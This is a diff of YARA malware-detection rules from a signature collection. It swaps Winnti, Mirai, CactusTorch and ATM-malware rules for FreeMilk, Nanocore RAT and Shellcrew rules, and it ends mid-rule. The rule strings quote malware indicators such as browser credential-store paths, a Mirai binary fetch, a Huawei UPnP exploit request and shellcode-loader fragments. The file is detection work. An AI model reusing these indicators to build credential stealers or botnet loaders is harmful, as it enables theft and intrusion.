-		hash4 = "80e088f2fd2dbde0f9bc21e056b6521991929c4e0ecd3eb5833edff6362283f4"
+		hash1 = "ef40f7ddff404d1193e025081780e32f88883fa4dd496f4189084d772a435cb2"
 
 	strings:
-		$x1 = "http://microsoftcompanywork.htm" fullword ascii
-		$x2 = "compose.aspx?s=%4X%4X%4X%4X%4X%4X" fullword ascii
-		$t1 = "http://babelfish.yahoo.com/translate_url?" fullword ascii
-		$t2 = "http://translate.google.com/translate?prev=hp&hl=en&js=n&u=%s?%d&sl=es&tl=en" fullword ascii
-		$u1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5." ascii
-		$u2 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)" fullword ascii
-		$u3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; TERA:" fullword ascii
-		$s1 = "\\system32\\ntoskrnl.exe" ascii
-		$s2 = "Schedsvc.dll" fullword wide
-		$s3 = "dllserver64.dll" fullword ascii
-		$s4 = "C:\\TERA_SR.txt" fullword ascii
-		$s5 = "updatevnsc.dat" fullword wide
-		$s6 = "tera dll service global event" fullword ascii
-		$s7 = "Referer: http://%s/%s" fullword ascii
-		$s8 = "tera replace dll config" fullword ascii
-		$s9 = "SetupDll64.dll" fullword ascii
-		$s10 = "copy %%ComSpec%% \"%s\"" fullword ascii
+		$s1 = "CMD.EXE /C \"%s\"" fullword wide
+		$s2 = "\\command\\start.exe" wide
+		$s3 = ".bat;.com;.cmd;.exe" fullword wide
+		$s4 = "Unexpected failure opening HKCR key: %d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 1 of ( $x* ) or all of ( $u* ) or 8 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them )
 }
-rule SIGNATURE_BASE_Unspecified_Malware_Jul17_1A : FILE
+
+rule SIGNATURE_BASE_Freemilk_APT_Mal_4 : FILE
 {
 	meta:
-		description = "Detects samples of an unspecified malware - July 2017"
+		description = "Detects malware from FreeMilk campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "348515d5-784f-519d-b426-87b8a53de5f3"
-		date = "2017-07-07"
+		id = "44f919f7-8eda-5e70-88d5-9e81a761192c"
+		date = "2017-10-05"
 		modified = "2023-12-05"
-		reference = "Winnti HDRoot VT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_hdroot.yar#L66-L83"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_freemilk.yar#L80-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e23af53be3e700055ea6536669065c131e7f674d45e43a389447c8c1f549dee5"
+		logic_hash = "deedb1da7e3421cd300fceea354a690e22005bab16eb0cc20b46f912393b637d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e1c38142b6194237a4cd4603829aa6edb6436e7bba15e3e6b0c9e8c6b629b42b"
+		hash1 = "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5"
 
 	strings:
-		$s1 = "%SystemRoot%\\System32\\wuauserv.dll" fullword ascii
-		$s2 = "systemroot%\\system32\\wuauserv.dll" fullword ascii
-		$s3 = "ocgen.logIN" fullword wide
-		$s4 = "ocmsn.logIN" fullword wide
-		$s5 = "Install.log" fullword wide
+		$x1 = "base64Encoded=\"TVqQAAMAAAAE" ascii
+		$s1 = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command" fullword wide
+		$s2 = "'Wscript.echo \"Base64 encoded: \" + base64Encoded" fullword ascii
+		$s3 = "\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
+		$s4 = "outFile=sysDir&\"\\rundll32.exe\"" fullword ascii
+		$s5 = "set shell = WScript.CreateObject(\"WScript.Shell\")" fullword ascii
+		$s6 = "command =outFile &\" sysupdate\"" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( ( pe.exports ( "getUpdate" ) and pe.number_of_exports == 1 ) or 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_MAL_Envrial_Jan18_1 : FILE
+rule SIGNATURE_BASE_Nanocore_RAT_Gen_1 : FILE
 {
 	meta:
-		description = "Detects Encrial credential stealer malware"
+		description = "Detetcs the Nanocore RAT and similar malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8be5f0d8-013f-5070-9e19-9ac522c88693"
-		date = "2018-01-21"
+		id = "b007e0ce-e64f-5027-95ff-d178383e3b59"
+		date = "2016-04-22"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/malwrhunterteam/status/953313514629853184"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_envrial.yar#L11-L40"
+		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nanocore_rat.yar#L8-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f047bedaac4dd934657b282a2587c55f3087a7cceb1a80becf14e7db3c365e8b"
-		score = 75
+		logic_hash = "09fab3ef1b4ca9092fd69fb09c4ef759946fcb5b84161441bff797bb4009ed00"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85"
-		hash2 = "9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d"
+		hash1 = "e707a7745e346c5df59b5aa4df084574ae7c204f4fb7f924c0586ae03b79bf06"
 
 	strings:
-		$x1 = "/Evrial/master/domen" wide
-		$a1 = "\\Opera Software\\Opera Stable\\Login Data" wide
-		$a2 = "\\Comodo\\Dragon\\User Data\\Default\\Login Data" wide
-		$a3 = "\\Google\\Chrome\\User Data\\Default\\Login Data" wide
-		$a4 = "\\Orbitum\\User Data\\Default\\Login Data" wide
-		$a5 = "\\Kometa\\User Data\\Default\\Login Data" wide
-		$s1 = "dlhosta.exe" fullword wide
-		$s2 = "\\passwords.log" wide
-		$s3 = "{{ <>h__TransparentIdentifier1 = {0}, Password = {1} }}" fullword wide
-		$s4 = "files/upload.php?user={0}&hwid={1}" fullword wide
+		$x1 = "C:\\Users\\Logintech\\Dropbox\\Projects\\New folder\\Latest\\Benchmark\\Benchmark\\obj\\Release\\Benchmark.pdb" fullword ascii
+		$x2 = "RunPE1" fullword ascii
+		$x3 = "082B8C7D3F9105DC66A7E3267C9750CF43E9D325" fullword ascii
+		$x4 = "$374e0775-e893-4e72-806c-a8d880a49ae7" fullword ascii
+		$x5 = "Monitorinjection" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 3 of them or 2 of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of them ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_ATM_Malware_Xfscashncr_1 : FILE
+rule SIGNATURE_BASE_Nanocore_RAT_Gen_2 : FILE
 {
 	meta:
-		description = "Detects ATM Malware XFSCashNCR"
-		author = "Frank Boldewin (@r3c0nst), modified by Florian Roth"
-		id = "0a70ef9a-9dde-54c9-a3a2-dfceff32932b"
-		date = "2019-08-28"
+		description = "Detetcs the Nanocore RAT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "74124961-3b0e-5808-b495-90437d3a5999"
+		date = "2016-04-22"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/r3c0nst/status/1166773324548063232"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_atm_xfscashncr.yar#L2-L23"
+		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nanocore_rat.yar#L28-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "014d07115543c6e041649a1c57206a75fd555bf0458c7578a33c81b473c72751"
-		score = 75
+		logic_hash = "23b3d149012fb8395b7daa2ecaf3ee66fdeac352ac94d632d76e52df2c6e8ea6"
+		score = 100
 		quality = 85
 		tags = "FILE"
-		hash1 = "d6dff67a6b4423b5721908bdcc668951f33b3c214e318051c96e8c158e8931c0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050"
 
 	strings:
-		$Code1 = {50 8b 4d e8 8b 51 10 52 6a 00 68 2d 01 00 00 8b 45 e8 0f b7 48 1c 51 e8}
-		$Code2 = {52 8d 45 d0 50 68 2e 01 00 00 8b 4d e8 0f b7 51 1c 52 e8}
-		$x_StatusMessage1 = "[+] Ingrese Denominacion ISO" nocase ascii
-		$x_StatusMessage2 = "[+] Ingrese numero de billetes" nocase ascii
-		$x_StatusMessage3 = "[!] FAIL.. dispensadores no encontrados" nocase ascii
-		$x_StatusMessage4 = "[!] Unable continue, IMPOSIBLE abrir dispenser" nocase ascii
-		$x_PDB = "C:\\Users\\cyttek\\Downloads\\xfs_cashXP\\Debug\\xfs_cash_ncr.pdb" nocase ascii
-		$LogFile = "XfsLog.txt" nocase ascii
+		$x1 = "NanoCore.ClientPluginHost" fullword ascii
+		$x2 = "IClientNetworkHost" fullword ascii
+		$x3 = "#=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 1500KB and ( 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_CACTUSTORCH : FILE
+rule SIGNATURE_BASE_Nanocore_RAT_Sample_1 : FILE
 {
 	meta:
-		description = "Detects CactusTorch Hacktool"
+		description = "Detetcs a certain Nanocore RAT sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "75606b9e-97d5-5b8b-87f5-69b7e415b73c"
-		date = "2017-07-31"
+		id = "381d3caf-77de-544c-869c-4d9f0cae148f"
+		date = "2016-04-22"
 		modified = "2023-12-05"
-		reference = "https://github.com/mdsecactivebreach/CACTUSTORCH"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_gen_cactustorch.yar#L11-L45"
+		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nanocore_rat.yar#L46-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "265287b27aa13840366dbb51ea58b2fdd10e0a57ff27d8deb52ff77dd71c26ad"
+		logic_hash = "c74e5fe7e9d4dd7f032281b0e617f2355bc5844acf04a8ffbfd42165c7d9b8e4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "314e6d7d863878b6dca46af165e7f08fedd42c054d7dc3828dc80b86a3a9b98c"
-		hash2 = "0305aa32d5f8484ca115bb4888880729af7f33ac99594ec1aa3c65644e544aea"
-		hash3 = "a52d802e34ac9d7d3539019d284b04ded3b8e197d5e3b38ed61f523c3d68baa7"
+		hash2 = "b7cfc7e9551b15319c068aae966f8a9ff563b522ed9b1b42d19c122778e018c8"
 
 	strings:
-		$x1 = "$payload = shellcode(%options[\"listener\"], \"true\", \"x86\");" fullword ascii
-		$x2 = "Copy the base64 encoded payload into the code variable below." fullword ascii
-		$x3 = " CACTUSTORCH Payload" ascii
-		$x4 = "ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)" fullword ascii
-		$x5 = "' Author: Vincent Yiu (@vysecurity)" fullword ascii
-		$x6 = "Dim binary : binary = \"rundll32.exe\"" fullword ascii
-		$a1 = "code = code & \"" ascii
-		$a2 = "serialized_obj = serialized_obj & \"" ascii
-		$s1 = "binary = \"rundll32.exe\"" fullword ascii
-		$s2 = "EL.DataType = \"bin.hex\"" fullword ascii
-		$s3 = "Set stm = CreateObject(\"System.IO.MemoryStream\")" fullword ascii
-		$s4 = "var binary = \"rundll32.exe\";" fullword ascii
-		$s5 = "var serialized_obj = \"" ascii
+		$x1 = "TbSiaEdJTf9m1uTnpjS.n9n9M7dZ7FH9JsBARgK" fullword wide
+		$x2 = "1EF0D55861681D4D208EC3070B720C21D885CB35" fullword ascii
+		$x3 = "popthatkitty.Resources.resources" fullword ascii
 
 	condition:
-		( filesize < 800KB and ( 1 of ( $x* ) or ( 1 of ( $a* ) and 1 of ( $s* ) ) ) ) or ( 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_LNK_Malicious_Nov1 : FILE
+rule SIGNATURE_BASE_Nanocore_RAT_Sample_2 : FILE
 {
 	meta:
-		description = "Detects a suspicious LNK file"
+		description = "Detetcs a certain Nanocore RAT sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1d08ac78-6ff0-5e3f-acc2-91bd63267d4c"
-		date = "2017-11-06"
+		id = "81f6771a-29a3-5fa0-8d24-ea717d3c5251"
+		date = "2016-04-22"
 		modified = "2023-12-05"
-		reference = "https://www.virustotal.com/en/file/ee069edc46a18698fa99b6d2204895e6a516af1a306ea986a798b178f289ecd6/analysis/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_link.yar#L2-L26"
+		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nanocore_rat.yar#L64-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a1aa29497a0e4741807e3d74d54be69061aed21524c5f901615bd21e2ef13c67"
-		score = 60
-		quality = 81
+		logic_hash = "505176b7320e95c652f0b6fdc6fadc3d16ff30115263862ba61209fa2fb82a2d"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "51142d1fb6c080b3b754a92e8f5826295f5da316ec72b480967cbd68432cede1"
 
 	strings:
-		$c1 = "C:\\Windows\\System32\\cmd.exe" ascii wide
-		$s1 = "cmd.exe /" ascii wide nocase
-		$s2 = { 00 25 00 53 00 79 00 73 00 74 00 65 00 6D 00 52
-              00 6F 00 6F 00 74 00 25 00 5C 00 53 00 79 00 73
-              00 74 00 65 00 6D 00 33 00 32 00 EF 01 2F 00 43
-              00 20 00 22 00 63 00 6D 00 64 00 2E 00 65 00 78
-              00 65 }
-		$s3 = "%comspec%" ascii wide nocase fullword
-		$fp1 = "Microsoft Visual" ascii wide
+		$s1 = "U4tSOtmpM" fullword ascii
+		$s2 = ")U71UDAU_QU_YU_aU_iU_qU_yU_" wide
+		$s3 = "Cy4tOtTmpMtTHVFOrR" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0x0000004c and filesize < 4KB and $c1 and 1 of ( $s* ) ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of ( $s* )
 }
-rule SIGNATURE_BASE_Mirai_Botnet_Malware : FILE
+rule SIGNATURE_BASE_Nanocore_RAT_Feb18_1 : FILE
 {
 	meta:
-		description = "Detects Mirai Botnet Malware"
+		description = "Detects Nanocore RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a678e9f7-d516-5bdb-962e-b9d39d8a64bb"
-		date = "2016-10-04"
-		modified = "2023-01-27"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mirai.yar#L10-L50"
+		id = "6db0c8a7-8c31-58a6-8732-de6663fec16b"
+		date = "2018-02-19"
+		modified = "2023-12-05"
+		reference = "Internal Research - T2T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nanocore_rat.yar#L92-L115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "384f8377ca05296da1177a8939f526069fbad0bb73769bd282d81ea4d876003c"
+		logic_hash = "824fd7304fb298ced69811078aa2dd23d7116554cffb8b6e4b690fccc93a4caf"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c"
-		hash2 = "05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c"
-		hash3 = "20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4"
-		hash4 = "2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69"
-		hash5 = "420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175"
-		hash6 = "62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6"
-		hash7 = "70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0"
-		hash8 = "89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147"
-		hash9 = "bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4"
-		hash10 = "c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f"
-		hash11 = "d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89"
-		hash12 = "f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5"
-		hash13 = "fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b"
+		hash1 = "aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c"
 
 	strings:
-		$x1 = "POST /cdn-cgi/" ascii
-		$x2 = "/dev/misc/watchdog" fullword ascii
-		$x3 = "/dev/watchdog" ascii
-		$x5 = ".mdebug.abi32" fullword ascii
-		$s1 = "LCOGQGPTGP" fullword ascii
-		$s2 = "QUKLEKLUKVJOG" fullword ascii
-		$s3 = "CFOKLKQVPCVMP" fullword ascii
-		$s4 = "QWRGPTKQMP" fullword ascii
-		$s5 = "HWCLVGAJ" fullword ascii
-		$s6 = "NKQVGLKLE" fullword ascii
+		$x1 = "NanoCore Client.exe" fullword ascii
+		$x2 = "NanoCore.ClientPluginHost" fullword ascii
+		$s1 = "PluginCommand" fullword ascii
+		$s2 = "FileCommand" fullword ascii
+		$s3 = "PipeExists" fullword ascii
+		$s4 = "PipeCreated" fullword ascii
+		$s5 = "IClientLoggingHost" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 200KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or 4 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 5 of them )
 }
-rule SIGNATURE_BASE_Mirai_1_May17 : FILE
+rule SIGNATURE_BASE_Nanocore_RAT_Feb18_2 : FILE
 {
 	meta:
-		description = "Detects Mirai Malware"
+		description = "Detects Nanocore RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ac85ee28-a01f-5c3d-a534-0c19a3dc92e7"
-		date = "2017-05-12"
+		id = "83a8ad4d-0bef-5ba2-aa10-eac5601f2c7b"
+		date = "2018-02-19"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mirai.yar#L62-L78"
+		reference = "Internal Research - T2T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nanocore_rat.yar#L117-L137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6816ab3b455bbde6c4bb43bff162615d7fc24b9d5828faa190600387c38978e1"
+		logic_hash = "c104e431a4ecc0d18d7eb74e7a55d32bf8978ee922637d48f3f6a9466a0f5b1a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "172d050cf0d4e4f5407469998857b51261c80209d9fa5a2f5f037f8ca14e85d2"
-		hash2 = "9ba8def84a0bf14f682b3751b8f7a453da2cea47099734a72859028155b2d39c"
-		hash3 = "a393449a5f19109160384b13d60bb40601af2ef5f08839b5223f020f1f83e990"
+		hash1 = "377ef8febfd8df1a57a7966043ff0c7b8f3973c2cf666136e6c04080bbf9881a"
 
 	strings:
-		$s1 = "GET /bins/mirai.x86 HTTP/1.0" fullword ascii
+		$s1 = "ResManagerRunnable" fullword ascii
+		$s2 = "TransformRunnable" fullword ascii
+		$s3 = "MethodInfoRunnable" fullword ascii
+		$s4 = "ResRunnable" fullword ascii
+		$s5 = "RunRunnable" fullword ascii
+		$s6 = "AsmRunnable" fullword ascii
+		$s7 = "ReadRunnable" fullword ascii
+		$s8 = "ExitRunnable" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 5000KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_Miari_2_May17 : FILE
+rule SIGNATURE_BASE_Streamex_Shellcrew
 {
 	meta:
-		description = "Detects Mirai Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1c2cc98d-8ca5-5055-8f86-7f85c046ccd9"
-		date = "2017-05-12"
+		description = "Detects a "
+		author = "Cylance"
+		id = "217077bb-71b7-5cbf-8adf-68a16688c415"
+		date = "2017-02-09"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mirai.yar#L80-L99"
+		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shellcrew_streamex.yar#L11-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "138a7d0c5508f0168f09329e97f00d0aacef17297558338cd88a9dc3ddddfee3"
-		score = 75
+		logic_hash = "a82ff51c1dcd1ebe3d7acc96b46b0b79dcead9146204f060f5413c4c7b5286d3"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "9ba8def84a0bf14f682b3751b8f7a453da2cea47099734a72859028155b2d39c"
-		hash2 = "a393449a5f19109160384b13d60bb40601af2ef5f08839b5223f020f1f83e990"
+		tags = ""
 
 	strings:
-		$s1 = "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36" fullword ascii
-		$s2 = "GET /g.php HTTP/1.1" fullword ascii
-		$s3 = "https://%[^/]/%s" fullword ascii
-		$s4 = "pass\" value=\"[^\"]*\"" fullword ascii
-		$s5 = "jbeupq84v7.2y.net" fullword ascii
+		$a = "0r+8DQY97XGB5iZ4Vf3KsEt61HLoTOuIqJPp2AlncRCgSxUWyebhMdmzvFjNwka="
+		$b = {34 ?? 88 04 11 48 63 C3 48 FF C1 48 3D D8 03 00 00}
+		$bb = {81 86 ?? ?? 00 10 34 ?? 88 86 ?? ?? 00 10 46 81 FE D8 03 00 00}
+		$c = "greendll"
+		$d = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" wide
+		$f = {26 5E 25 24 23 91 91 91 91}
+		$g = "D:\\pdb\\ht_d6.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 5000KB and 2 of them )
+		$a or $b or $bb or ( $c and $d ) or $f or $g
 }
-rule SIGNATURE_BASE_MAL_ELF_LNX_Mirai_Oct10_1 : FILE
+rule SIGNATURE_BASE_Shellcrew_Streamex_1 : FILE
 {
 	meta:
-		description = "Detects ELF Mirai variant"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7bb28f03-03ba-581a-bc03-bd09a52787d9"
-		date = "2018-10-27"
-		modified = "2023-01-27"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mirai.yar#L101-L122"
+		id = "26b4cac0-3f2b-5637-86f5-16b7f8afa0e6"
+		date = "2017-02-10"
+		modified = "2022-12-21"
+		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shellcrew_streamex.yar#L40-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d16ed12522b310fccab027355281a206f5087d555f0d1fef4e7746d01d085613"
+		logic_hash = "4da0b8843de87e53243af40700afaab77120531af28dc311d9100bce6721650b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "81f411415aefa5ad7f7ed2365d9a18d0faf33738617afc19215b69c23f212c07"
 
 	strings:
-		$x1 = " -r /vi/mips.bushido; "
-		$x2 = "/bin/busybox chmod 777 * /tmp/" ascii
-		$s1 = "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1" fullword ascii
-		$s2 = "loadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>" fullword ascii
-		$s3 = "POST /cdn-cgi/" ascii
+		$x1 = "cmd.exe /c  \"%s\"" fullword wide
+		$s3 = "uac\\bin\\install_test.pdb" ascii
+		$s5 = "uncompress error:%d %s" fullword ascii
+		$s7 = "%s\\AdobeBak\\Proc.dat" fullword wide
+		$s8 = "e:\\workspace\\boar" fullword ascii
+		$s12 = "$\\data.ini" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 200KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or all of ( $x* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 4 of them )
 }
-rule SIGNATURE_BASE_MAL_ELF_LNX_Mirai_Oct10_2 : FILE
+rule SIGNATURE_BASE_Shellcrew_Streamex_1_Msi : FILE
 {
 	meta:
-		description = "Detects ELF malware Mirai related"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "421b7708-030e-50d1-bf2e-e91758a48c00"
-		date = "2018-10-27"
+		id = "8cf5dad5-0737-56bf-8cef-7bcf7e7e5a78"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mirai.yar#L124-L138"
+		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shellcrew_streamex.yar#L61-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "47d20bdf64c18c925dc1391b022278f913b7fbce13988a7b5de2e9d135c5a265"
+		logic_hash = "fa853dac58c067a88f1784ac4017fd558151e54ed10ceb32ab90c99e970460fe"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8c9048e2f5ea2ef9516cac06dc0fba8a7e97754468c0d9dc1e5f7bce6dbda2cc"
 
 	strings:
-		$c01 = { 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00
